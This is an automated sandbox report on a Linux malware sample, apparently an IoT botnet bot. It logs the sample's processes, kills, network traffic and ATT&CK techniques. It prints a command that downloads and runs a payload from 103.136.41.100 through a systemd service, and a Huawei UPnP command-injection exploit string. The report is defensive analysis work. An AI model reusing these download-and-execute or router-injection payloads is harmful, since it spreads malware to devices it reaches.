Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
3.elf

Overview

General Information

Sample name:3.elf
Analysis ID:1588812
MD5:366778b08315367d82a6ea8481ddcdaa
SHA1:897e2e7197bd9d80754f7caf8fbb962e476a5c17
SHA256:35137294137da3a15894aa17a335631372ed8968dfc892a8f13e2f8469389ad4
Tags:elfuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Sample deletes itself
Sample tries to kill multiple processes (SIGKILL)
Detected non-DNS traffic on DNS port
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "wget" command typically used for HTTP/S downloading
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1588812
Start date and time:2025-01-11 05:50:29 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 55s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:3.elf
Detection:MAL
Classification:mal56.spre.evad.linELF@0/3@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: http://103.136.41.100/3
Command:/tmp/3.elf
PID:6209
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • 3.elf (PID: 6209, Parent: 6128, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/3.elf
    • 3.elf New Fork (PID: 6220, Parent: 6209)
    • sh (PID: 6220, Parent: 6209, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload > /dev/null 2>&1"
      • sh New Fork (PID: 6226, Parent: 6220)
      • systemctl (PID: 6226, Parent: 6220, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • 3.elf New Fork (PID: 6230, Parent: 6209)
    • sh (PID: 6230, Parent: 6209, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start hello.service > /dev/null 2>&1"
      • sh New Fork (PID: 6245, Parent: 6230)
      • systemctl (PID: 6245, Parent: 6230, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start hello.service
  • wrapper-2.0 (PID: 6213, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 6214, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 6215, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 6216, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 6217, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 6218, Parent: 2063, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 6228, Parent: 6227)
  • snapd-env-generator (PID: 6228, Parent: 6227, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6246, Parent: 1)
  • bash (PID: 6246, Parent: 1, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "sleep 10; rm -rf /tmp/3; wget http://103.136.41.100/3 -O /tmp/3; chmod 777 /tmp/3; /tmp/3 .p1 > /dev/null 2>&1;"
    • bash New Fork (PID: 6247, Parent: 6246)
    • sleep (PID: 6247, Parent: 6246, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 10
    • bash New Fork (PID: 6257, Parent: 6246)
    • rm (PID: 6257, Parent: 6246, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/3
    • bash New Fork (PID: 6258, Parent: 6246)
    • wget (PID: 6258, Parent: 6246, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget http://103.136.41.100/3 -O /tmp/3
    • bash New Fork (PID: 6260, Parent: 6246)
    • chmod (PID: 6260, Parent: 6246, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 /tmp/3
    • bash New Fork (PID: 6261, Parent: 6246)
    • 3 (PID: 6261, Parent: 6246, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/3 .p1
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 3.elfVirustotal: Detection: 27%Perma Link
Source: 3.elfReversingLabs: Detection: 31%
Source: global trafficTCP traffic: 192.168.2.23:43247 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.23:37545 -> 1.1.1.1:53
Source: /bin/bash (PID: 6258)Wget executable: /usr/bin/wget -> wget http://103.136.41.100/3 -O /tmp/3Jump to behavior
Source: /tmp/3.elf (PID: 6209)Socket: 127.0.0.1:23476Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 103.136.41.100
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 103.136.41.100Connection: Keep-Alive
Source: 3.44.drString found in binary or memory: http://%d.%d.%d.%d/%s
Source: 3.elf, 3.44.drString found in binary or memory: http://%d.%d.%d.%d/2;
Source: 3.elf, 6209.1.00007fbbd4036000.00007fbbd403a000.rw-.sdmp, bash, 6261.1.00007f129c036000.00007f129c03a000.rw-.sdmp, 3, 6261.1.00007f129c036000.00007f129c03a000.rw-.sdmpString found in binary or memory: http://1/wget.sh
Source: hello.service.12.drString found in binary or memory: http://103.136.41.100/3
Source: 3.elf, 6209.1.00007fbbd4036000.00007fbbd403a000.rw-.sdmp, bash, 6261.1.00007f129c036000.00007f129c03a000.rw-.sdmp, 3, 6261.1.00007f129c036000.00007f129c03a000.rw-.sdmpString found in binary or memory: http://9/curl.sh
Source: 3.44.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 3.44.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

System Summary

barindex
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2018, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2077, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2078, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2079, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2080, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2083, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2084, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2156, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 6213, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 6214, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 6215, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 6216, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 6217, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 6218, result: successfulJump to behavior
Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sampleString containing 'busybox' found: %s%d%s<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2018, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2077, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2078, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2079, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2080, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2083, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2084, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 2156, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 6213, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 6214, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 6215, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 6216, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 6217, result: successfulJump to behavior
Source: /tmp/3.elf (PID: 6209)SIGKILL sent: pid: 6218, result: successfulJump to behavior
Source: classification engineClassification label: mal56.spre.evad.linELF@0/3@0/0
Source: /tmp/3 (PID: 6261)File opened: /proc/6230/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/6230/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/6230/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/6230/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/6230/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/6230/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1582/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2033/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2033/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2275/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2275/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1612/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1612/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1579/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1699/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1335/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1698/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2028/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2028/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1334/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/1576/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2302/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/3236/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/3236/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2025/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2025/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2146/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/2146/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/912/fdJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/759/cmdlineJump to behavior
Source: /tmp/3 (PID: 6261)File opened: /proc/759/fdJump to behavior
Source: /tmp/3.elf (PID: 6220)Shell command executed: sh -c "systemctl daemon-reload > /dev/null 2>&1"Jump to behavior
Source: /tmp/3.elf (PID: 6230)Shell command executed: sh -c "systemctl start hello.service > /dev/null 2>&1"Jump to behavior
Source: /usr/lib/systemd/systemd (PID: 6246)Shell command executed: /bin/bash -c "sleep 10; rm -rf /tmp/3; wget http://103.136.41.100/3 -O /tmp/3; chmod 777 /tmp/3; /tmp/3 .p1 > /dev/null 2>&1;"Jump to behavior
Source: /bin/bash (PID: 6260)Chmod executable: /usr/bin/chmod -> chmod 777 /tmp/3Jump to behavior
Source: /bin/bash (PID: 6257)Rm executable: /usr/bin/rm -> rm -rf /tmp/3Jump to behavior
Source: /bin/sh (PID: 6226)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 6245)Systemctl executable: /usr/bin/systemctl -> systemctl start hello.serviceJump to behavior
Source: /bin/bash (PID: 6258)Wget executable: /usr/bin/wget -> wget http://103.136.41.100/3 -O /tmp/3Jump to behavior
Source: /usr/bin/chmod (PID: 6260)File: /tmp/3 (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
Source: /bin/bash (PID: 6260)Chmod executable with 777: /usr/bin/chmod -> chmod 777 /tmp/3Jump to behavior
Source: /usr/bin/wget (PID: 6258)File written: /tmp/3Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /usr/bin/rm (PID: 6257)File: /tmp/3Jump to behavior
Source: /bin/bash (PID: 6247)Sleep executable: /usr/bin/sleep -> sleep 10Jump to behavior
Source: /tmp/3.elf (PID: 6209)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6213)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6214)Queries kernel information via 'uname': Jump to behavior
Source: /bin/bash (PID: 6246)Queries kernel information via 'uname': Jump to behavior
Source: /tmp/3 (PID: 6261)Queries kernel information via 'uname': Jump to behavior
Source: 3.elf, 6209.1.000056398e19a000.000056398e2eb000.rw-.sdmpBinary or memory string: 9V!/etc/qemu-binfmt/arm
Source: bash, 6261.1.000055f77e561000.000055f77e6b2000.rw-.sdmp, 3, 6261.1.000055f77e561000.000055f77e6b2000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: bash, 6261.1.00007ffcf4fb5000.00007ffcf4fd6000.rw-.sdmp, 3, 6261.1.00007ffcf4fb5000.00007ffcf4fd6000.rw-.sdmpBinary or memory string: Ybx86_64/usr/bin/qemu-arm/tmp/3.p1PWD=/LANG=en_US.UTF-8INVOCATION_ID=60c8c7bcbac04ea1bc4a195eacc440bfSHLVL=1JOURNAL_STREAM=9:75248PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin_=/tmp/3/tmp/3
Source: 3.elf, 6209.1.000056398e19a000.000056398e2eb000.rw-.sdmp, bash, 6261.1.000055f77e561000.000055f77e6b2000.rw-.sdmp, 3, 6261.1.000055f77e561000.000055f77e6b2000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: 3.elf, 6209.1.00007ffd2900f000.00007ffd29030000.rw-.sdmp, bash, 6261.1.00007ffcf4fb5000.00007ffcf4fd6000.rw-.sdmp, 3, 6261.1.00007ffcf4fb5000.00007ffcf4fd6000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: 3.elf, 6209.1.00007ffd2900f000.00007ffd29030000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/3.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/3.elf
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Systemd Service
1
Systemd Service
2
File and Directory Permissions Modification
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
Boot or Logon Initialization Scripts11
File Deletion
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive12
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
